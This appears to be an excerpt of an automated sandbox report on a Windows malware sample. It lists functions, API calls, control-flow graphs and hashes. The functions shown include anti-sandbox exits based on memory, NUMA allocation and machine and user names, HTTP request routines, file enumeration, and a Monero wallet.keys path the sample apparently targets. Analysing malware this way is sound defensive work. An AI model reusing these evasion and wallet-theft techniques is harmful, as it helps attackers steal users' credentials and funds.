                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 299f5a64ae457bbbd5e4e5de96f813cf4445bf982773f8a185f9c4a1304d420e
                          • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                          • Opcode Fuzzy Hash: 299f5a64ae457bbbd5e4e5de96f813cf4445bf982773f8a185f9c4a1304d420e
                          • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
                          Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 401220-401247 call 4189b0 GlobalMemoryStatusEx 1439 401273-40127a 1436->1439 1440 401249-401271 call 41da00 * 2 1436->1440 1442 401281-401285 1439->1442 1440->1442 1444 401287 1442->1444 1445 40129a-40129d 1442->1445 1447 401292-401294 ExitProcess 1444->1447 1448 401289-401290 1444->1448 1448->1445 1448->1447
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                          • __aulldiv.LIBCMT ref: 00401258
                          • __aulldiv.LIBCMT ref: 00401266
                          • ExitProcess.KERNEL32 ref: 00401294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                          • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                          • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                          • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                          Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 416af3 1451 416b0a 1450->1451 1453 416aba-416ad7 call 41aad0 OpenEventA 1451->1453 1454 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1451->1454 1459 416af5-416b04 CloseHandle Sleep 1453->1459 1460 416ad9-416af1 call 41aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01288960,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                          • Sleep.KERNEL32(00001770), ref: 00416B04
                          • CloseHandle.KERNEL32(?,00000000,?,01288960,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                          • ExitProcess.KERNEL32 ref: 00416B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                          • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                          • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                          • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                          Function 004047B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 600d680c1239d35025b49ae2814dad2431850bcef8d5bbfbc2ad1460741ced9e
                          • Instruction ID: 78c41c35656f1d7250599e6002f689f367db3d185723c3c0f38606331754de45
                          • Opcode Fuzzy Hash: 600d680c1239d35025b49ae2814dad2431850bcef8d5bbfbc2ad1460741ced9e
                          • Instruction Fuzzy Hash: 17215EB5D00208ABDF10DFA5EC45ADE7B75FF05320F108629F915A72D0EB706A0ACB91
                          Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                            • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00406303
                            • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                            • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00406385
                            • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                            • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 68903d0483a5cfddd37e4e678035d1cc38455bcd0da457ff09669bb0dc953b82
                          • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                          • Opcode Fuzzy Hash: 68903d0483a5cfddd37e4e678035d1cc38455bcd0da457ff09669bb0dc953b82
                          • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                          Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00417917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                          • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                          • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                          • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                          Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0040112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401132
                          • ExitProcess.KERNEL32 ref: 00401143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                          • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                          • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                          • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                          Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004010B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004010F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                          • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                          • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                          • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                          Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417910
                            • Part of subcall function 004178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00417917
                            • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                            • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                            • Part of subcall function 00417850: RtlAllocateHeap.NTDLL(00000000), ref: 00417887
                            • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                          • ExitProcess.KERNEL32 ref: 004011C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: aa4888be3a4750dc3e8542411c62f0187eb34aedb4e2e69f1eafe5013a8257c2
                          • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                          • Opcode Fuzzy Hash: aa4888be3a4750dc3e8542411c62f0187eb34aedb4e2e69f1eafe5013a8257c2
                          • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE

                          Non-executed Functions

                          Function 004138B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 004138CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                          • lstrcat.KERNEL32(?,?), ref: 00413935
                          • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                          • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                          • FindClose.KERNEL32(000000FF), ref: 00413C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                          • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                          • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                          • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                          Function 0040BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                          • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                          • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                          Strings
                          Memory Dump Source
